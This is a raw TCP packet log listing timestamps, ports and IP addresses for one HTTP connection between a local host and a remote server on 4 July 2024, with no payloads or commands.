                  Jul 4, 2024 03:12:30.373420000 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.374113083 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.374119997 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.374876022 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.374882936 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.375727892 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.375735044 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.375763893 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.376409054 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.376415968 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.376424074 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.376445055 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.376526117 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.377109051 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.377115011 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.377125978 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.377218962 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.378140926 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.378148079 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.378158092 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.379291058 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.379297972 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.379307032 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.379313946 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.379331112 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.379368067 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.379368067 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.380269051 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.380275965 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.380285978 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.380467892 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.381253004 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.381259918 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.381272078 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.381364107 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.382282019 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.382289886 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.382299900 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.382306099 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.382355928 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.382452965 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.383323908 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.383330107 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.383341074 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.383426905 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.384311914 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.384319067 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.384324074 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.384392023 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.445950031 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.446057081 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.446161985 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.446171999 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.446239948 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.446755886 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.446762085 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.446772099 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.446846008 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.447741985 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.447751045 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.447752953 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.447758913 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.447767973 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.447803974 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.447865009 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.448981047 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.449076891 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.449162960 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.449168921 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.449222088 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.449783087 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.449788094 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.449793100 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.449839115 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.449839115 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.455838919 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.456029892 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.456034899 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.456036091 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.456165075 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.456688881 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.456695080 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.456706047 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.456801891 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.457628965 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.457636118 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.457705021 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.458172083 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.458178043 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.458183050 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.458236933 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.458236933 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.459153891 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.459158897 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.459168911 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.459224939 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.459224939 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.460172892 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.460180044 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.460190058 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.460196018 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.460257053 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.460257053 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.461493015 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.461499929 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.461503983 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.461584091 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.462193966 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.462201118 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.462210894 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.462246895 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.463179111 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.463186026 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.463196039 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.463201046 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.463289022 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.464015961 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.464023113 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.464032888 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.464104891 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.464822054 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.464828014 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.464833021 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.464880943 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.464880943 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.465585947 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.465591908 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.465603113 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.465607882 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.465656996 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.465656996 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.466411114 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.466418028 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.466427088 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.466475010 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.466475010 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.467406034 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.467411995 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.467417002 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.467442989 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.467489958 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.468005896 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.468012094 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.468022108 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.468027115 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.468077898 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.468808889 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.468822956 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.468825102 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.468878031 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.469594955 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.469602108 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.469614983 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.469666004 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.469666004 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.470541000 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.470549107 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.470554113 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.470558882 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.470602036 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.471174955 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.471182108 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.471191883 CEST8049754185.234.72.101192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 4, 2024 03:12:30.471249104 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.471249104 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.471945047 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.471951008 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.471961021 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.472021103 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.472021103 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.472676992 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.472702980 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.472709894 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.472714901 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.472734928 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.472776890 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.473467112 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.473473072 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.473478079 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.473485947 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.473515034 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.473557949 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.474426985 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.474433899 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.474437952 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.474442959 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.474483967 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.475406885 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.475414038 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.475418091 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.475425005 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.475430012 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.475454092 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.475498915 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.476330042 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.476336956 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.476346970 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.476352930 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.476356983 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.476386070 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.476418972 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.535952091 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.536067009 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.536082029 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.536088943 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.536139965 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.536600113 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.536604881 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.536617041 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.536621094 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.536669970 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.536669970 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.537414074 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.537419081 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.537429094 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.537431955 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.537518024 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.538130999 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.538136959 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.538141966 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.538145065 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.538150072 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.538186073 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.538228035 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.539099932 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.539107084 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.539112091 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.539117098 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.539242983 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.540123940 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.540128946 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.540138960 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.540143967 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.540149927 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.540179014 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.540227890 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.541016102 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.541023016 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.541033983 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.541038990 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.541079044 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.541122913 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.545491934 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.545584917 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.545595884 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.545691013 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.545860052 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.545866013 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.546039104 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.546240091 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.546245098 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.546253920 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.546258926 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.546263933 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.546314001 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.546314955 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.547081947 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.547086954 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.547163963 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.547441959 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.547446966 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.547457933 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.547514915 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.547514915 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.547987938 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.547992945 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.548000097 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.548005104 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.548015118 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.548064947 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.548901081 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.548913956 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.548928022 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.548933029 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.548938990 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.548943996 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.548971891 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.549006939 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.549844980 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.549849987 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.549860954 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.549866915 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.549871922 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.549926043 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.549926043 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.550762892 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.550770044 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.550780058 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.550786018 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.550790071 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.550796032 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.550833941 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.550834894 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.551734924 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.551740885 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.551749945 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.551755905 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.551764965 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.551770926 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.551774025 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.551805973 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.552630901 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.552704096 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.552719116 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.552725077 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.552731037 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.552735090 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.552743912 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.552762985 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.552803993 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.553677082 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.553683996 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.553689003 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.553694010 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.553698063 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.553703070 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
